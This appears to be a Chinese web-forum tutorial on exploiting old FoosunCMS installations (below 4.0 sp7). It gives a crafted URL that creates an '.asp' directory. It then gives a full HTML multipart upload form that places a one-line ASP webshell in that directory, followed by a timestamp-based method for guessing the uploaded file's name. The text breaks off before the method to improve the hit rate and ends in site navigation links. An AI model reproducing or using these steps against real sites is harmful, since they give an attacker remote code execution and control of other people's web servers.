1.版本:應該是 4.0 sp7以下的吧(應該算不上0day漏洞了).(網(wǎng)上資料說的,5.0版本的我沒測試),我主要用圖片詳細解釋漏洞利用過程.
2.過程:
a)看版本,訪問網(wǎng)站跟admin目錄,看登陸的logo (foosuncms),提示版本.
b)注冊, 訪問/User/Reg_service.asp,記錄這個id,如下圖:
c)增加.asp目錄,如:aaa.asp,那么訪問:/User/CommPages/FolderImageList.asp?f_UserNumber=091310I59B3&Type=AddFolder&Path=/userfiles/091310I59B3/aaa.asp//&CurrPath=/userfiles/091310I59B3
(記得將091310I59B3替換為你的注冊后的編號).訪問后應該看到如下的目錄(否則就是不支持.asp目錄了或者最新修復了漏洞的版本,后續(xù)沒得搞了,不用看了,就此打住吧):
3.傳一句話到aaa.asp目錄,這兒我自己根據(jù)抓包編寫了一個html,關鍵解決圖片上傳后文件名猜解問題(記得替換下面html里面得id與網(wǎng)址):
<form name=from1 method="post" enctype="multipart/form-data" target="new1" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
數(shù)量<input name=FilesNum value=1>
<input type=file name="File1"><br>
<input name="Path" value=/UserFiles/091310I59B3/abcdefg><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit >
</form>
<br><br>
<form name=from2 method="post" enctype="multipart/form-data" target="new2" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
數(shù)量<input name=FilesNum value=10>
<input type=file name="File1"><br>
<input type=file name="File2"><br>
<input type=file name="File3"><br>
<input type=file name="File4"><br>
<input type=file name="File5"><br>
<input type=file name="File6"><br>
<input type=file name="File7"><br>
<input type=file name="File8"><br>
<input type=file name="File9"><br>
<input type=file name="File10"><br>
<input name="Path" value=/UserFiles/091310I59B3/aaa.asp><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit>
</form>
<br><br>
4.猜解上傳到aaa.asp目錄得文件名,這兒注意觀察文件名文規(guī)則與文件夾時間:
從上圖看出:剛提交上去得一句話文件夾保存時間為:2010-7-9 15:08:38,那么文件名(假設是gif文件) 應該是:
2010_07_09_15_08_38xxxxx.gif,看出來了吧,最后38是秒數(shù),那么現(xiàn)在不確定的是最后5位數(shù)字.
5.解決猜解概率問題:雖然5位數(shù)字最多99999次,(10萬次呀),不多也不少,下面結合上面自己編的html說明一下如何增加命中率:
域名注冊知識
虛擬主機知識
網(wǎng)站建設知識
網(wǎng)絡推廣知識
網(wǎng)絡營銷知識
常見技術問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)
